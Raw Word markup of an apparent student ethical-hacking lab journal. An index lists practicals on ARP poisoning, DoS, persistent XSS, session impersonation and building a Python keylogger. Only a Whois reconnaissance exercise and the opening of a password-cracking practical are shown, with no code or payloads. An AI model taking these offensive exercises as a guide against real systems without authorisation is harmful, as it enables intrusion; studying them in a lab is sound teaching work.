              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F1255A" w:rsidTr="00AA12D5">
        <w:trPr>
          <w:trHeight w:val="1365"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1090" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5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35" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRPr="00541342" w:rsidRDefault="00404938" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="349"/>
              <w:rPr>
                <w:rFonts w:ascii="Carlito"/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>Linux Network Analysis and ARP Poisoning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRPr="00541342" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F1255A" w:rsidRPr="00541342" w:rsidRDefault="00404938" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr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>20/01/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F1255A" w:rsidTr="00AA12D5">
        <w:trPr>
          <w:trHeight w:val="1288"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1090" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="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35" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRPr="00541342" w:rsidRDefault="00404938" w:rsidP="00AA12D5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 xml:space="preserve">Port Scanning with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00541342">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>NMap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRPr="00541342" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F1255A" w:rsidRPr="00541342" w:rsidRDefault="00404938" w:rsidP="00404938">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr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>27/02/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F1255A" w:rsidTr="00AA12D5">
        <w:trPr>
          <w:trHeight w:val="1610"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1090" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5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35" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRPr="00541342" w:rsidRDefault="00404938" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="223"/>
              <w:rPr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 xml:space="preserve">Network Traffic Capture and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00541342">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>DoS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00541342">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> Attack with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00541342">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Wireshark</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00541342">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00541342">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Nemesy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRPr="00541342" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F1255A" w:rsidRPr="00541342" w:rsidRDefault="00404938" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr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>03/02/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F1255A" w:rsidTr="00AA12D5">
        <w:trPr>
          <w:trHeight w:val="2051"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1090" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5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35" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRPr="00541342" w:rsidRDefault="00404938" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="177"/>
              <w:rPr>
                <w:rFonts w:ascii="Carlito"/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>Persistent Cross-Site Scripting Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRPr="00541342" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F1255A" w:rsidRPr="00541342" w:rsidRDefault="00404938" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr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>10/02/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F1255A" w:rsidTr="00AA12D5">
        <w:trPr>
          <w:trHeight w:val="1288"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1090" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5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35" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRPr="00541342" w:rsidRDefault="00404938" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="83"/>
              <w:rPr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>Session Impersonation with Firefox and Tamper Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00404938" w:rsidRPr="00541342" w:rsidRDefault="00404938" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F1255A" w:rsidRPr="00541342" w:rsidRDefault="00404938" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr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>17/02/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F1255A" w:rsidTr="00AA12D5">
        <w:trPr>
          <w:trHeight w:val="1367"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1090" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5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35" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRPr="00541342" w:rsidRDefault="00404938" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="380"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Carlito"/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 xml:space="preserve">Creating a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00541342">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Keylogger</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00541342">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> with Python</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRPr="00541342" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F1255A" w:rsidRPr="00541342" w:rsidRDefault="00404938" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00541342">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>09/02/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A" w:rsidP="00AA12D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="3328"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="3328"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="3328"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="3328"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="3328"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F1255A" w:rsidRDefault="00F1255A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="3328"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="3328"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>PRACTICAL  NO.1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AIM :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A19F9" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Google and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A19F9" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007A19F9" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidR="00AC79F2" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:r w:rsidR="007A19F9" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC79F2" w:rsidRPr="00AC79F2" w:rsidRDefault="00AC79F2" w:rsidP="00AC79F2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Google and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Reconnaissance </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC79F2" w:rsidRPr="00AC79F2" w:rsidRDefault="00AC79F2" w:rsidP="00AC79F2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Use Google search techniques to gather information about a specific target or organization.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC79F2" w:rsidRPr="00AC79F2" w:rsidRDefault="00AC79F2" w:rsidP="00AC79F2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Utilize advanced search operators to refine search results and access hidden information. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00AC79F2" w:rsidP="00AC79F2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Perform </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> lookups to retrieve domain registration information and gather details about the target's infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:spacing w:before="90"/>
        <w:ind w:left="3332" w:right="3507"/>
        <w:jc w:val="center"/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Using who.is</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Step1: Open the WHO.is website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25120153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4990</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5935184" cy="3224403"/>
            <wp:effectExtent l="19050" t="0" r="8416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184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spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="90"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Step 2: Enter the website name and hit the “Enter button”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25120256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438</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5903629" cy="216655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629" cy="2166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Default="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRDefault="00D4195F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRPr="00D4195F" w:rsidRDefault="00D4195F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4" w:rsidP="00D4195F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step 3: Show you information about </w:t>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidRPr="00D4195F">
          <w:rPr>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>www.prestashop.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25120358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796</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5930366" cy="481126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366" cy="481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D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F"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974020</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>124827</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5807488" cy="767838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488" cy="7678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spacing w:before="12"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4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974020</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>104638</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5852735" cy="651729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735" cy="65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1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footerReference w:type="default" r:id="rId18"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="124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3D03C4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noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25120665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796</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5905795" cy="566918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795" cy="566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21" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:tab/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26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3D03C4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noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251207680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>969285</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>603367</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5884831" cy="566813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831" cy="566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21"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4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CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A913FB" w:rsidRDefault="00A913FB" w:rsidP="00A913FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="3328"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>PRACTICAL  NO</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>. 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC79F2" w:rsidRDefault="00AC79F2" w:rsidP="00AC79F2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC79F2" w:rsidRPr="00AC79F2" w:rsidRDefault="00AC79F2" w:rsidP="00AC79F2">
      <w:pPr>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AIM :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC79F2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Password Encryption and Cracking with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC79F2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CrypTool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC79F2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> and Cain and Abel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC79F2" w:rsidRPr="00AC79F2" w:rsidRDefault="00AC79F2" w:rsidP="00AC79F2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC79F2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Password Encryption and Decryption-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC79F2" w:rsidRPr="00AC79F2" w:rsidRDefault="00AC79F2" w:rsidP="00AC79F2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC79F2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC79F2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CrypTool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC79F2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> to encrypt passwords using the RC4 algorithm.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00AC79F2" w:rsidRDefault="00AC79F2" w:rsidP="00AC79F2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
